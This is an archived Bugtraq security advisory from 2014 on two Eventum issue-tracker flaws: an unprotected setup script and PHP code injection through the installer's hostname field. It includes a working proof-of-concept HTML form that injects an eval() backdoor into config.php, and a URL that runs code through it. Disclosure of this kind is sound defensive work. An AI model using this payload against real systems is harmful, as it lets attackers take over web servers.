'Multiple Vulnerabilities in Eventum'

[prev in list] [next in list] [prev in thread] [next in thread] 

List:       bugtraq
Subject:    Multiple Vulnerabilities in Eventum
From:       High-Tech Bridge Security Research <advisory () htbridge ! com>
Date:       2014-01-27 13:40:20
Message-ID: 20140127134020.DE0772C587EA () htbridge ! ch
[Download RAW message or body]

Advisory ID: HTB23198
Product: Eventum
Vendor: Eventum Development Team
Vulnerable Version(s): 2.3.4 and probably prior
Tested Version: 2.3.4
Advisory Publication:  January 22, 2014  [without technical details]
Vendor Notification: January 22, 2014 
Vendor Patch: January 24, 2014 
Public Disclosure: January 27, 2014 
Vulnerability Type: Incorrect Default Permissions [CWE-276], Code Injection [CWE-94]
CVE References: CVE-2014-1631, CVE-2014-1632
Risk Level: Critical 
CVSSv2 Base Scores: 6.4 (AV:N/AC:L/Au:N/C:N/I:P/A:P), 10 (AV:N/AC:L/Au:N/C:C/I:C/A:C)
Solution Status: Fixed by Vendor
Discovered and Provided: High-Tech Bridge Security Research Lab ( \
https://www.htbridge.com/advisory/ ) 

-----------------------------------------------------------------------------------------------


Advisory Details:

High-Tech Bridge Security Research Lab discovered vulnerability in Eventum, which can \
be exploited to reinstall and compromise vulnerable application.


1) Incorrect Default Permissions in Eventum: CVE-2014-1631

The vulnerability exists due to incorrect default permission set for installation \
scripts. Access to installation script located at "/setup/index.php" is not \
restricted by default and the script is not deleted during the installation process. \
A remote attacker can access the script and reinstall vulnerable application. 

The installation script can be access by a remote unauthenticated user via the \
following URL:

http://[host]/setup/index.php


2) Code Injection in Eventum: CVE-2014-1632

The vulnerability exists due to insufficient sanitization of the HTTP POST parameter \
"hostname" in "/config/config.php" script during the installation process. A remote \
attacker can inject and execute arbitrary PHP code on the target system with \
privileges of the webserver. Successful exploitation requires access to application's \
database, which can be achieved by providing address of attacker-controlled MySQL \
server. 

The following exploitation example injects a backdoor into "/config/config.php" file:


<form action="http://[host]/setup/index.php" method="post" name="main">
<input type="hidden" name="cat" value="install">
<input type="hidden" name="hostname" value="'); eval($_GET['cmd']); $tmp=('">
<input type="hidden" name="relative" value="/">
<input type="hidden" name="db_hostname" value="db_hostname">
<input type="hidden" name="db_name" value="db_name">
<input type="hidden" name="db_table_prefix" value="db_table_prefix">
<input type="hidden" name="drop_tables" value="yes">
<input type="hidden" name="db_username" value="db_username">
<input type="hidden" name="setup[smtp][from]" value="email@email.com">
<input type="hidden" name="setup[smtp][host]" value="localhost">
<input type="hidden" name="setup[smtp][port]" value="25">
<input type="hidden" name="" value="">
<input type="submit" id="btn">
</form>


After successful reinstallation an attacker can execute arbitrary PHP code on the \
system. The following example executes the "phpinfo()" PHP function on the vulnerable \
system:

http://[host]/index.php?cmd=phpinfo%28%29;

-----------------------------------------------------------------------------------------------


Solution:

Update to Eventum 2.3.5

More Information:
https://bugs.launchpad.net/eventum/+bug/1271499

Vendor disclosed vulnerabilities and authorized us to release advisory on public \
before our usual delay (3 weeks).

-----------------------------------------------------------------------------------------------


References:

[1] High-Tech Bridge Advisory HTB23198 - https://www.htbridge.com/advisory/HTB23198 - \
Multiple Vulnerabilities in Eventum. [2] Eventum - https://launchpad.net/eventum - \
Eventum is a user-friendly and flexible issue tracking system that can be used by a \
support department to track incoming technical support requests, or by a software \
development team to quickly organize tasks and bugs. [3] Common Vulnerabilities and \
Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public \
use, CVE Ž is a dictionary of publicly known information security vulnerabilities and \
exposures. [4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to \
developers and security practitioners, CWE is a formal list of software weakness \
types. [5] ImmuniWeb Ž - http://www.htbridge.com/immuniweb/ - is High-Tech Bridge's \
proprietary web application security assessment solution with SaaS delivery model \
that combines manual and automated vulnerability testing.

-----------------------------------------------------------------------------------------------


Disclaimer: The information provided in this Advisory is provided "as is" and without \
any warranty of any kind. Details of this Advisory may be updated in order to provide \
as accurate information as possible. The latest version of the Advisory is available \
on web page [1] in the References.


[prev in list] [next in list] [prev in thread] [next in thread]
Configure | About | News | Add a list | Sponsored by KoreLogic